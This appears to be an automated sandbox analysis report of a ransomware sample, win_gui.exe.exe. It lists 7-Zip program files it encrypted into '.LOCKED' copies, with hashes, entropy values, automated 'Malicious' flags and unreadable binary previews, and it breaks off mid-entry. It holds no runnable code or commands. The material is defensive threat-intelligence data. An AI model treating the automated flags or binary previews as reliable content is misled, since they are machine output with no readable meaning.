                                SHA1:65439B92136E9075EEB29B3287AA68E3392855D0
                                SHA-256:0DABE5EA29A2EF1EF0C6B8D0857719FD6353B84CE0AD1A6A166D8F8874A33553
                                SHA-512:39E9435A89361C17FF520104C1FAD28ED21907AA187728827B49618BE858F754D2A0B21768AE786C0FB5D7011AB1E4A13DD04466345A54C2333524198E7E3385
                                Malicious:true
                                Preview:mB.D........:.l.... .....n.v.K.;!R.D....rD....|......U......I'...Lr.KXZT......O..=...n .V.&hi.g.cC..j-.......:..5.XO...C1;.,.........H...Z.....U0-.3...{]..U..A ...qYn81Ac....V..U...$..7P=T.z9...+A1.....N...e.@......(..mq_`../.+Z....cOn....g..|i...E.v.k4.w.A.l...z..o..q$.fV....q.=..#...z...T...f..k...:c.u........A...s...q..-....E...@W..'$..G...}...m,W.b....X.='y..i$.......dD..}..j.)(.)s?...U8+..X.'..".-...eb......b=...>P...Z.....>.>K.O...P.{/nk2:.MP_.n.:@..I...Y.o..|W.R..Q..4.].......m.Q/...u.hs....\~J;...+E.~U.,..I.....w...Ks.{@.3.BM...`.#.n.Q..hv_Q.b..b..5L5.X..........t..`...#N...:%.w..[=?.._....,...........V.TA...z.d...t..z.+.G..m.$a.J..X........X.u.\...i...#...6.rL..G..........r.gJ.&.`..,2...*Gg..BJ.v...N......Nu.....Z....9..nH.Yg.T...G.Y..}.....\....(.....d...b.N.l.A.[..E...!......Y......K.Lj..G....a..'1.."i.h1...[.w.:.o<...[..F.A\..n..Ikp0J.......E..C..r...O.>...(..7yM.%.....#i.7kP....J).i..e......}.^=.4.#......5.}y.@..K.[...;

                                C:\Program Files\7-Zip\7-zip.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):101984
                                Entropy (8bit):7.998340541249593
                                Encrypted:true
                                SSDEEP:3072:1cizNUJYaZnBktXO6Je/G/ri+8Tqf71vyTjU:L+R2tXs/G/rd8Tqf7ATjU
                                MD5:484F7DC87F428D7114D2AC6C88B6DF64
                                SHA1:CC29EEE97A2F8DDEBE8768CB01C5BE419EACFBA1
                                SHA-256:2723E81492A40491693727037035C621839C2A565240D83414D50D1A96CC4CC0
                                SHA-512:D2AF4BAF55DC37C983D4C7986482DC2B6416598963978531169544ADACE91DFED6619CB8ECF895B7C1DF19F4137B91BE89820D83286E75F872264B7DE692D99C
                                Malicious:true
                                Preview:$ .SjZ.. ..!.L.X-q...N.eo.e..^!mm.._.7..@..fj.-.px...U.g.T..P..f.._N,W.......R.$.j.g... .0...:}....]s..V~>...i..P$....`.w...6~..1.u)}eN.zk...Y..X..&...l-.O..tl.....8...I..HME........._.]Us.U<....@f...........;.........}(;..).0...$..RD..:.{.u...7..bU..1....6..y..O...g...........I..O.x.(....u...F.1.>..b.E...[!>..4s..n....Top..c-.1B.~..b. 5....w.I. .HOC..~.'$..y.A.....`.4..I..JrP..A.i.aY(.m:7..._....GAt....9..E....x..*b......l0..q.s.M+..nBL.E....[...N...(.....V...T.c..f..:..m....{G/B...4.#..P.#.k..8...q...d.....[....:C..=....f.a..y.|D~.........dy.._.0[Ow...&.b[..z:Z.........m.._5. .Y...pWZ...8..1....X....H.O...g.Dl....B;..%._...#. 6..^L?.U..^..Sw..V.MoY.......X.W..{zQ .7C.If.,.../.%..,TY.........@j...5&.#....]...\...s.q-v~.....&I .Z..E9..z.A..._.J.e......!..`......&eo..v...@i.B%...z.....<.*..y...n;....1.. IH.-_..U.(Ox.h...:./..q.G.[.C;.4...m.Tw.....oN..U<L...Q.#?..$U=o.i"%7/.8.........%..NT.ewe......G.oS..h.....C...QO=..d.;.5..1..|..

                                C:\Program Files\7-Zip\7-zip.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):101984
                                Entropy (8bit):7.998340541249593
                                Encrypted:true
                                SSDEEP:3072:1cizNUJYaZnBktXO6Je/G/ri+8Tqf71vyTjU:L+R2tXs/G/rd8Tqf7ATjU
                                MD5:484F7DC87F428D7114D2AC6C88B6DF64
                                SHA1:CC29EEE97A2F8DDEBE8768CB01C5BE419EACFBA1
                                SHA-256:2723E81492A40491693727037035C621839C2A565240D83414D50D1A96CC4CC0
                                SHA-512:D2AF4BAF55DC37C983D4C7986482DC2B6416598963978531169544ADACE91DFED6619CB8ECF895B7C1DF19F4137B91BE89820D83286E75F872264B7DE692D99C
                                Malicious:true
                                Preview:$ .SjZ.. ..!.L.X-q...N.eo.e..^!mm.._.7..@..fj.-.px...U.g.T..P..f.._N,W.......R.$.j.g... .0...:}....]s..V~>...i..P$....`.w...6~..1.u)}eN.zk...Y..X..&...l-.O..tl.....8...I..HME........._.]Us.U<....@f...........;.........}(;..).0...$..RD..:.{.u...7..bU..1....6..y..O...g...........I..O.x.(....u...F.1.>..b.E...[!>..4s..n....Top..c-.1B.~..b. 5....w.I. .HOC..~.'$..y.A.....`.4..I..JrP..A.i.aY(.m:7..._....GAt....9..E....x..*b......l0..q.s.M+..nBL.E....[...N...(.....V...T.c..f..:..m....{G/B...4.#..P.#.k..8...q...d.....[....:C..=....f.a..y.|D~.........dy.._.0[Ow...&.b[..z:Z.........m.._5. .Y...pWZ...8..1....X....H.O...g.Dl....B;..%._...#. 6..^L?.U..^..Sw..V.MoY.......X.W..{zQ .7C.If.,.../.%..,TY.........@j...5&.#....]...\...s.q-v~.....&I .Z..E9..z.A..._.J.e......!..`......&eo..v...@i.B%...z.....<.*..y...n;....1.. IH.-_..U.(Ox.h...:./..q.G.[.C;.4...m.Tw.....oN..U<L...Q.#?..$U=o.i"%7/.8.........%..NT.ewe......G.oS..h.....C...QO=..d.;.5..1..|..

                                C:\Program Files\7-Zip\7-zip32.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):67168
                                Entropy (8bit):7.997716078598476
                                Encrypted:true
                                SSDEEP:1536:lsmlbolwGfcq0jYJL2dptjMMhRv3YM3YOAisYY1Q:lsLwGfcq0kJI3XRoFTPi
                                MD5:3C9AE74E2B201BAC3E28FD24A91158F7
                                SHA1:8AF3F674A4A207C69798DA674C75AFF3023046D2
                                SHA-256:1B2AD069A5E1D1AAADB2095E9A8406C4DDF90186EA7F3FF1BE819297E269FF22
                                SHA-512:6C181BB91F288168D5122D49B6C8AB22A4E7F7ABEDDC9BBBDD21672B95F64B2D373CCFB5F359AD3BBD4ED368ABF2FADC096FE78B18055ABAAEED7C1FF40A69ED
                                Malicious:true
                                Preview:....(..t..~.?N*9\e8<b...O"|O..9ID.{....|...K.....0..-....SW..... .w?...6N..~..X{V.....v.B......,y...'6k...V'..UFb%.q(W..2..@..E...T..ii..F.{c.b...d..).....*_#..l..|3.N...L....._I...}..q.8.C.<QA.../.(>Y...C..M..:.0..........xmM..*.if|.5~..U.<pgIlp. .....V.\.A.......Y.5.. ..b.i...<tL;.$....,a.H*9......C.R{... ...&3....@.C...[.f..p......z<.<.?.gw..&hD$.....F..vE....t.1.6...ZxT.Ur.v.]......yI..B,...w.j.z+......3Q....v%$9.5..Qj....Vlhm...IfK.NzO.U.n.H.Cy8B. ."....Z.....@Q............X...zX.Pf..A..-.z.............!...3\...:f...k...q.K..~kX.y9.Y`...:W.J.k...Zo........d..$nF...xt...9.q.7..$D.f\.R.*Jy!.n...,]....S..I..@1.~.......m.+......U.....j..T...m....[.e.6....5..=O..e..e].(QDS.>v....e..G.x..k;..N..{.*...g.,.qb........!)k.S..Gf...4....,..i.a.g...+..M..X..7R.z..k.~=.....B..2..*..*.c..6Z.F."..g5......W....V..3.~.rx.7...0Ue._......|t...(|:w...[..1.<G.&o...qd.d...'.....-C.9..1W..hPxDmV...LO..Q$.X...&=.y..f!#r...........].'..o.+W.%...R

                                C:\Program Files\7-Zip\7-zip32.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):67168
                                Entropy (8bit):7.997716078598476
                                Encrypted:true
                                SSDEEP:1536:lsmlbolwGfcq0jYJL2dptjMMhRv3YM3YOAisYY1Q:lsLwGfcq0kJI3XRoFTPi
                                MD5:3C9AE74E2B201BAC3E28FD24A91158F7
                                SHA1:8AF3F674A4A207C69798DA674C75AFF3023046D2
                                SHA-256:1B2AD069A5E1D1AAADB2095E9A8406C4DDF90186EA7F3FF1BE819297E269FF22
                                SHA-512:6C181BB91F288168D5122D49B6C8AB22A4E7F7ABEDDC9BBBDD21672B95F64B2D373CCFB5F359AD3BBD4ED368ABF2FADC096FE78B18055ABAAEED7C1FF40A69ED
                                Malicious:true
                                Preview:....(..t..~.?N*9\e8<b...O"|O..9ID.{....|...K.....0..-....SW..... .w?...6N..~..X{V.....v.B......,y...'6k...V'..UFb%.q(W..2..@..E...T..ii..F.{c.b...d..).....*_#..l..|3.N...L....._I...}..q.8.C.<QA.../.(>Y...C..M..:.0..........xmM..*.if|.5~..U.<pgIlp. .....V.\.A.......Y.5.. ..b.i...<tL;.$....,a.H*9......C.R{... ...&3....@.C...[.f..p......z<.<.?.gw..&hD$.....F..vE....t.1.6...ZxT.Ur.v.]......yI..B,...w.j.z+......3Q....v%$9.5..Qj....Vlhm...IfK.NzO.U.n.H.Cy8B. ."....Z.....@Q............X...zX.Pf..A..-.z.............!...3\...:f...k...q.K..~kX.y9.Y`...:W.J.k...Zo........d..$nF...xt...9.q.7..$D.f\.R.*Jy!.n...,]....S..I..@1.~.......m.+......U.....j..T...m....[.e.6....5..=O..e..e].(QDS.>v....e..G.x..k;..N..{.*...g.,.qb........!)k.S..Gf...4....,..i.a.g...+..M..X..7R.z..k.~=.....B..2..*..*.c..6Z.F."..g5......W....V..3.~.rx.7...0Ue._......|t...(|:w...[..1.<G.&o...qd.d...'.....-C.9..1W..hPxDmV...LO..Q$.X...&=.y..f!#r...........].'..o.+W.%...R

                                C:\Program Files\7-Zip\7z.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1842272
                                Entropy (8bit):6.815005846114559
                                Encrypted:false
                                SSDEEP:49152:g0cQQ94iZNrLIBjhTt0deROyyIjnRnUYA:g0zQSinIBF+mW2R9A
                                MD5:D292E049F530D866E36754983435A9F9
                                SHA1:512D6130F4EC8C69F64ED550BAEE8B73B7942D48
                                SHA-256:60889E9C13969A457B6DD581108B5F76DD0CCB165467DD82976C776916F74B71
                                SHA-512:ECA5E73929446865850660DDA7257EBB64A586D929EB591BC8C7AC3A9B6A81E56B16E5BC50DA6812C4405B608A32B7DC3CD0274811C70A757B944F229D822F11
                                Malicious:true
                                Preview:q.qQ....G.....b..B..N..-.j.#...ogW....q.t....&n..d....^5.......c.*".^/...#=...4l/.*..T....h.1...*..v.3.._.U....0..Q4.T?.K...........~OI.......t....3g......u.....el.m9g..%..r^9./.....7#...o....v...5%&k.N...yB.U......V.H..}-.*..Rjx.........K..(..<.8J`DlRb..L..;d..Y...-79.`.B93..y............3....I.Z.VI...U6.>.,.......3k.....<...p.X..C....5..`Q(l.zX.....:KZ.b.jC....$..n.....5.q..D...7E..X=^..P..|.@[:.M.rt.g....n...8...I.$..3\..tjCJ.............D..lb..f.`...!M..4.~.....T..R.if}.|hn....r...cQ..=~...8c..."}_...-..p.,.}E6,.t.u{h....K0...0'......j...7.C...j.....~.@L_.?M.1....U.b......;.....h,F+...ZJ...*.7.).0.$.0S.h.m.ci....y.l?.u..;.cN..`|.6.......r}Yy..P.(.G..I..p.E;T.sS._S.9.G..q...-..v.2..e.....Q.....q............c...Pf.%..E..k....w=...+.+9!..uA..Z?/...l..."/...86..............).*..=...c].........@!c....w-.<.'PNI|.*..8.=..YV.x.=/[...<}cnS.J.L[.T.o.....=......n.|..C.;.....:D|F.i..N..I....0@.........2..i....#Z...^..vB...,...8....U...l......

                                C:\Program Files\7-Zip\7z.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1842272
                                Entropy (8bit):6.815005846114559
                                Encrypted:false
                                SSDEEP:49152:g0cQQ94iZNrLIBjhTt0deROyyIjnRnUYA:g0zQSinIBF+mW2R9A
                                MD5:D292E049F530D866E36754983435A9F9
                                SHA1:512D6130F4EC8C69F64ED550BAEE8B73B7942D48
                                SHA-256:60889E9C13969A457B6DD581108B5F76DD0CCB165467DD82976C776916F74B71
                                SHA-512:ECA5E73929446865850660DDA7257EBB64A586D929EB591BC8C7AC3A9B6A81E56B16E5BC50DA6812C4405B608A32B7DC3CD0274811C70A757B944F229D822F11
                                Malicious:false
                                Preview:q.qQ....G.....b..B..N..-.j.#...ogW....q.t....&n..d....^5.......c.*".^/...#=...4l/.*..T....h.1...*..v.3.._.U....0..Q4.T?.K...........~OI.......t....3g......u.....el.m9g..%..r^9./.....7#...o....v...5%&k.N...yB.U......V.H..}-.*..Rjx.........K..(..<.8J`DlRb..L..;d..Y...-79.`.B93..y............3....I.Z.VI...U6.>.,.......3k.....<...p.X..C....5..`Q(l.zX.....:KZ.b.jC....$..n.....5.q..D...7E..X=^..P..|.@[:.M.rt.g....n...8...I.$..3\..tjCJ.............D..lb..f.`...!M..4.~.....T..R.if}.|hn....r...cQ..=~...8c..."}_...-..p.,.}E6,.t.u{h....K0...0'......j...7.C...j.....~.@L_.?M.1....U.b......;.....h,F+...ZJ...*.7.).0.$.0S.h.m.ci....y.l?.u..;.cN..`|.6.......r}Yy..P.(.G..I..p.E;T.sS._S.9.G..q...-..v.2..e.....Q.....q............c...Pf.%..E..k....w=...+.+9!..uA..Z?/...l..."/...86..............).*..=...c].........@!c....w-.<.'PNI|.*..8.=..YV.x.=/[...<}cnS.J.L[.T.o.....=......n.|..C.;.....:D|F.i..N..I....0@.........2..i....#Z...^..vB...,...8....U...l......

                                C:\Program Files\7-Zip\7z.exe

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):557664
                                Entropy (8bit):7.49347164270054
                                Encrypted:false
                                SSDEEP:6144:u5lLX+EGb5R3jHi8660XBlMOrjkf0H05yqE6Hl0ChW0+ksllAXBu0lWGWU4K4Pnq:AlLWXHWvxem2g7XO3LWUoook9eiwcdp
                                MD5:F9BF6BE34C67E9349A0F502DA86FBCD0
                                SHA1:A43BC256D1D4CD807565106C748075A7D9DF1F75
                                SHA-256:CCC82C57B48EA9FCBC5CAE476A76F51EF243D62228294D3DBB954D42037942B5
                                SHA-512:F75CD371D9E140C26840DE56D161B1F338FE6E97DD6A7598C0EF1914B700D08A2DF4E5B7B37B5CF2816B7E5102F416ABFF00C2EEA2761D4EE4E5774F1264CD55
                                Malicious:true
                                Preview:^:..V.....'3}...]..9...<.I.5...dj.h.=......>...z*..-.[[..@....u.u.' .-.(...A...0;....G...&lJ...s../.q..9.F.2;*$T..c..F.2*.....C}.(.|.Z.t;N........x5si..8.?.H....4....r).P..T._.Ko...%.....!.....Ov.P.....t.P.3~.................yE~.O.. ...j8.4."..7.L%.E4...BR.?..*j.i"..O......p..JEp.R..fb.y..C,J...V.n....3.'....|.?........)...T.V..k..m'.p#..WiW.U-U.....|S....)zt._8.D...-.K...]]..i ....=........B.M.N..U.......>;...f.D......]....p;.{..sU.....3....s.5...[..b'~.a.}.{..=mA.uA.I..x2....L..A.....IR....^.;.....[s...QT...<T?[4B.._..z..<t....V..I..........j6.N....YP.$..3.h.O...N...y..s..9 \...g.`..E.........0.Z.i.g.0..;.}.\...Li.`R.o..N,..2....vc.k..P..Twb...@]..-.B->....Lo..U5@........N..g.....,oN...L.f&.._.tY.#._...._1.y>..(....h..vd..@..n.U.s..\....w.....th..[p_v...'.PZ..XD5D.k.......9.U.C..<4man.,....(..W.._......#H........Hr....D$..L.v....HIu.8B...A.q.....:.-~......`.>.%i..&F.y.6r...N'...c.^.Bg...2....:..D`.e9...}3...ZOd.R@g..;....p..kZ"...g7@!H.G.qI..AW

                                C:\Program Files\7-Zip\7z.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):557664
                                Entropy (8bit):7.49347164270054
                                Encrypted:false
                                SSDEEP:6144:u5lLX+EGb5R3jHi8660XBlMOrjkf0H05yqE6Hl0ChW0+ksllAXBu0lWGWU4K4Pnq:AlLWXHWvxem2g7XO3LWUoook9eiwcdp
                                MD5:F9BF6BE34C67E9349A0F502DA86FBCD0
                                SHA1:A43BC256D1D4CD807565106C748075A7D9DF1F75
                                SHA-256:CCC82C57B48EA9FCBC5CAE476A76F51EF243D62228294D3DBB954D42037942B5
                                SHA-512:F75CD371D9E140C26840DE56D161B1F338FE6E97DD6A7598C0EF1914B700D08A2DF4E5B7B37B5CF2816B7E5102F416ABFF00C2EEA2761D4EE4E5774F1264CD55
                                Malicious:false
                                Preview:^:..V.....'3}...]..9...<.I.5...dj.h.=......>...z*..-.[[..@....u.u.' .-.(...A...0;....G...&lJ...s../.q..9.F.2;*$T..c..F.2*.....C}.(.|.Z.t;N........x5si..8.?.H....4....r).P..T._.Ko...%.....!.....Ov.P.....t.P.3~.................yE~.O.. ...j8.4."..7.L%.E4...BR.?..*j.i"..O......p..JEp.R..fb.y..C,J...V.n....3.'....|.?........)...T.V..k..m'.p#..WiW.U-U.....|S....)zt._8.D...-.K...]]..i ....=........B.M.N..U.......>;...f.D......]....p;.{..sU.....3....s.5...[..b'~.a.}.{..=mA.uA.I..x2....L..A.....IR....^.;.....[s...QT...<T?[4B.._..z..<t....V..I..........j6.N....YP.$..3.h.O...N...y..s..9 \...g.`..E.........0.Z.i.g.0..;.}.\...Li.`R.o..N,..2....vc.k..P..Twb...@]..-.B->....Lo..U5@........N..g.....,oN...L.f&.._.tY.#._...._1.y>..(....h..vd..@..n.U.s..\....w.....th..[p_v...'.PZ..XD5D.k.......9.U.C..<4man.,....(..W.._......#H........Hr....D$..L.v....HIu.8B...A.q.....:.-~......`.>.%i..&F.y.6r...N'...c.^.Bg...2....:..D`.e9...}3...ZOd.R@g..;....p..kZ"...g7@!H.G.qI..AW

                                C:\Program Files\7-Zip\7z.sfx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):215136
                                Entropy (8bit):7.999161498696595
                                Encrypted:true
                                SSDEEP:6144:4h88zHMa0i+3mBWDXPGyo3h7/P8XFbSB7v7SHw:wKRt2IXPG9hP8kBcw
                                MD5:CF05EE704574703C1771E218AA4E8A48
                                SHA1:1896EC6BF1F5EC6BFE3D10EF8FDDB76E1C3086D1
                                SHA-256:F2631ABAFACEA31599783EDAFA3B308D2EE3506C5726F65716DDB77E0463D28F
                                SHA-512:6FFDA10AC87E1A68023E6BBF4E828C294D0E9DC70A3835C9EB50E98E9CC7A4CDD2CEE3B1C37CB0343CA625F734A5061AA9A40C9F4BBA3DF5A1235C81FEC266A8
                                Malicious:true
                                Preview:.....<.....h.#iW.8.../e.x..|oLV.B.\s...1cJ....3J$.....<I.%...d^.majF...|..V.5.p...g.X...D...<,x...F.7."`...~...O.O.v..Mv74F._.2.(....4.$.jL%.0...[.....8..k..k.D..[..i%4......zg.gb.....0R@.._....k.`..vm.#=b.w.a......K.#.`D).P..F...6..q...d..Ic.....b%.Z|9.Y..cI..W..3..2x.....|....#......f^2ox..(.....[O.u....#n.]#@*Qh.nTo.6.s...y........R.../5..."...V....}.O....}...;.>..k.hK......&.....L...$.Tb.......@.........g..m~......TJ?.G)..`..o.;...!6...8..m.........&...G..../G.@...#.?..M..j9t.0!i.C..a...K.w{-(S....&...$.p...q..i....}c...iZ8.....h.Ee.k.5.x...HA^....3F.h.4..z....h...K...0.B.@.P-..U.V}..L.).0...r."!.u...z.3...L..+Q....Y.G_.t....3......m..w.#.`.G...w...CZP..<....@..?....?|.uu3j..X....ST.#.Q..R.O...B.E..}<E..........y.6&.A.6......t...A.a~......Y...8......q.:............YBu..6.U.[u.......|...d..X..e.*.._...-c....U.........v.Ds5..B...a$O$.!~fHTp.+.&X.8.sb.{/X%..WEb.].....Ml..gf..A2......A...J.,.....z...&...qat..%b...'t:..$..........+..

                                C:\Program Files\7-Zip\7z.sfx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):215136
                                Entropy (8bit):7.999161498696595
                                Encrypted:true
                                SSDEEP:6144:4h88zHMa0i+3mBWDXPGyo3h7/P8XFbSB7v7SHw:wKRt2IXPG9hP8kBcw
                                MD5:CF05EE704574703C1771E218AA4E8A48
                                SHA1:1896EC6BF1F5EC6BFE3D10EF8FDDB76E1C3086D1
                                SHA-256:F2631ABAFACEA31599783EDAFA3B308D2EE3506C5726F65716DDB77E0463D28F
                                SHA-512:6FFDA10AC87E1A68023E6BBF4E828C294D0E9DC70A3835C9EB50E98E9CC7A4CDD2CEE3B1C37CB0343CA625F734A5061AA9A40C9F4BBA3DF5A1235C81FEC266A8
                                Malicious:true
                                Preview:.....<.....h.#iW.8.../e.x..|oLV.B.\s...1cJ....3J$.....<I.%...d^.majF...|..V.5.p...g.X...D...<,x...F.7."`...~...O.O.v..Mv74F._.2.(....4.$.jL%.0...[.....8..k..k.D..[..i%4......zg.gb.....0R@.._....k.`..vm.#=b.w.a......K.#.`D).P..F...6..q...d..Ic.....b%.Z|9.Y..cI..W..3..2x.....|....#......f^2ox..(.....[O.u....#n.]#@*Qh.nTo.6.s...y........R.../5..."...V....}.O....}...;.>..k.hK......&.....L...$.Tb.......@.........g..m~......TJ?.G)..`..o.;...!6...8..m.........&...G..../G.@...#.?..M..j9t.0!i.C..a...K.w{-(S....&...$.p...q..i....}c...iZ8.....h.Ee.k.5.x...HA^....3F.h.4..z....h...K...0.B.@.P-..U.V}..L.).0...r."!.u...z.3...L..+Q....Y.G_.t....3......m..w.#.`.G...w...CZP..<....@..?....?|.uu3j..X....ST.#.Q..R.O...B.E..}<E..........y.6&.A.6......t...A.a~......Y...8......q.:............YBu..6.U.[u.......|...d..X..e.*.._...-c....U.........v.Ds5..B...a$O$.!~fHTp.+.&X.8.sb.{/X%..WEb.].....Ml..gf..A2......A...J.,.....z...&...qat..%b...'t:..$..........+..

                                C:\Program Files\7-Zip\7zCon.sfx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):193632
                                Entropy (8bit):7.9990381381583955
                                Encrypted:true
                                SSDEEP:3072:bnghRMFOTDEVtWJAgqYDECV0YFA9Js0hijdqtZ24Lgh4ibkCXEqh5GU34tq+WTyf:jgh6Nt8rqYR0YF4m0jshsW5h4tayaEkO
                                MD5:F98E4D5703481FB57420CD059A5FE721
                                SHA1:7B087E5E5243BEBC9BD243962BD442D5D334FC34
                                SHA-256:038813DDD21AE7785F45BF0156F4755FC1CD16CB5590798C2F0C134E33C3F386
                                SHA-512:CDA905D980B2F848B63FAE5DCC806E744F5A29F44EB58ECB34435DAF9E5096BF109F8984DB2A492607ED6637FA81CA873397E4C80171FB05DBAF446BE59F37CC
                                Malicious:true
                                Preview:........v...a..7....+E.7...m|e..t...N.....$.s.........].-j`.z..-.....8..pd...>`...t.!..2...8....4.\..L.. ..yn...$^..]......gt...r...t .E[I.G......*......8.Y.....l...}1J)0..,.[N?........s9...p.J....k[.lE.........c.ub..bT.2....kV.x.`.".Z.d..a.......h...K..C...T&..AW..f..)...s.O..OQ.l;.G..C.....|.#.?F.%...^....0\.0.....M...)p..:C...F....Z^...f...,...#..5s.P......"}.c ..4. .?....."..EC....CF....T..mJc.O..!.Y2....c<u8pp<...']>..Vp.#Z.-$z.....^..l..\u..v.......a9](....oI...H...k.\..H.sk..{...^..w......R.{...:='.x..G.j..Es..arz.../b.r.l..g.Cu.q....b.g.O.f...R..Wy.....hDXV...s../..6.....6.3.P...W.+.85...8_...Zf..!..x...1S.F..Td$.gi..r..Y.......z.......>J...........R..L.&..{!.Za....g...9G........b.l .=G....mZeV.{...wRc.....a.}..K..B....*.h|..F2qu.N..o...++....Sz.i.>.K.f.2...U.Q|Cv......*...l..w....:H.5........+...t!.$T.t..........n.3.%.?.bz..\.|..N.....`0..H...6L...p.w..w.x....W.y..B.8Ar.+..[.....`...r.%>M.6e.o.>...0..5@.LS.?...Rm.K...S}..<]r..0.

                                C:\Program Files\7-Zip\7zCon.sfx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):193632
                                Entropy (8bit):7.9990381381583955
                                Encrypted:true
                                SSDEEP:3072:bnghRMFOTDEVtWJAgqYDECV0YFA9Js0hijdqtZ24Lgh4ibkCXEqh5GU34tq+WTyf:jgh6Nt8rqYR0YF4m0jshsW5h4tayaEkO
                                MD5:F98E4D5703481FB57420CD059A5FE721
                                SHA1:7B087E5E5243BEBC9BD243962BD442D5D334FC34
                                SHA-256:038813DDD21AE7785F45BF0156F4755FC1CD16CB5590798C2F0C134E33C3F386
                                SHA-512:CDA905D980B2F848B63FAE5DCC806E744F5A29F44EB58ECB34435DAF9E5096BF109F8984DB2A492607ED6637FA81CA873397E4C80171FB05DBAF446BE59F37CC
                                Malicious:true
                                Preview:........v...a..7....+E.7...m|e..t...N.....$.s.........].-j`.z..-.....8..pd...>`...t.!..2...8....4.\..L.. ..yn...$^..]......gt...r...t .E[I.G......*......8.Y.....l...}1J)0..,.[N?........s9...p.J....k[.lE.........c.ub..bT.2....kV.x.`.".Z.d..a.......h...K..C...T&..AW..f..)...s.O..OQ.l;.G..C.....|.#.?F.%...^....0\.0.....M...)p..:C...F....Z^...f...,...#..5s.P......"}.c ..4. .?....."..EC....CF....T..mJc.O..!.Y2....c<u8pp<...']>..Vp.#Z.-$z.....^..l..\u..v.......a9](....oI...H...k.\..H.sk..{...^..w......R.{...:='.x..G.j..Es..arz.../b.r.l..g.Cu.q....b.g.O.f...R..Wy.....hDXV...s../..6.....6.3.P...W.+.85...8_...Zf..!..x...1S.F..Td$.gi..r..Y.......z.......>J...........R..L.&..{!.Za....g...9G........b.l .=G....mZeV.{...wRc.....a.}..K..B....*.h|..F2qu.N..o...++....Sz.i.>.K.f.2...U.Q|Cv......*...l..w....:H.5........+...t!.$T.t..........n.3.%.?.bz..\.|..N.....`0..H...6L...p.w..w.x....W.y..B.8Ar.+..[.....`...r.%>M.6e.o.>...0..5@.LS.?...Rm.K...S}..<]r..0.

                                C:\Program Files\7-Zip\7zFM.exe

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):953440
                                Entropy (8bit):7.050376048576232
                                Encrypted:false
                                SSDEEP:12288:IU6cxQiuWpwtIy6Rmi78gkPH3aPI9vyVg/0paQuj3IkdPyt6KNt5lTXjtpU:IeeWp/DRmi78gkPXlyo0Gkl/jrU
                                MD5:38DFB2371995085D08FF680B0904E367
                                SHA1:758DA052FDC9CBF7251F7F90215BC350053CB091
                                SHA-256:BE5416C96E13EB90CCC4AB2337991D8E2D8CB362691FA28E9C45CB32698AE45C
                                SHA-512:CAF2FB8AD25957C62249A4F5821FFE2F4DB7C115CC7E2C444B4BE513193FA7B310018CC3B4B5DD75C1DFBF1A25EA22C18E623871BDC2FE206E91D7BD920D6D1B
                                Malicious:true
                                Preview:.*@.....cm.vDt.E..~..~h$......\q.#..?.S3..S(..?.bZ5F..j.H..:....Q..z...`s"S........Do..&..a.+.`..m..%.<.HM..K...6....E.;..T2...."..P...`.u.y.].Z.<_..Wle.8.y.8.7.I..R{E...?..'[!u.!Ui..S.Wz,^.)..@n....y.OQ..q....b.4YdR.]..hi.0W.G.@..E0.B..<......9......P....$...6..p}P/D.v'C.C&i.......B.+...l{.S"'...A.....l..".. s..\...>..q..!...p.'.b..1..L..,.L..&..\.<)r.#..Fi,\........E..e..>.d.H...p......ma<.mJ../n....;...$..'.....s...&.....xo ..:.pO.......R.X.!....HL..R....s...y..FfV...Y.Et...w%e..Y...[.W. ._OG......w[..&.:"0_.oX.|.....R..W....8..X.....B.R.9.o.....u./..=..../.d..8...c.....$|.e..h!....?4.r..,...Bb....:.L..R:.+ .M......jo{T...=`...`A..7K7`.../...B....6....M.FS......K.U...{..L.Lq%y.d..uK.."..I.K.d~...2}.l.`lg..R..3.].[.J..6.9L/.$G..DmH.....u.@.F..R.b.rw...%.".(.;.y.cR.Z.BI.M....G.]`..A.....~?M...!.6!-B.....~....Ig..U.....:.a......oy....@.rheP..co...4..Sz.....o.$7.. ....Ay..}.....c.^'8...i.sL.r.j.c..m"...=..E...:a..\+.G.K......k....M.u"....

                                C:\Program Files\7-Zip\7zFM.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):953440
                                Entropy (8bit):7.050376048576232
                                Encrypted:false
                                SSDEEP:12288:IU6cxQiuWpwtIy6Rmi78gkPH3aPI9vyVg/0paQuj3IkdPyt6KNt5lTXjtpU:IeeWp/DRmi78gkPXlyo0Gkl/jrU
                                MD5:38DFB2371995085D08FF680B0904E367
                                SHA1:758DA052FDC9CBF7251F7F90215BC350053CB091
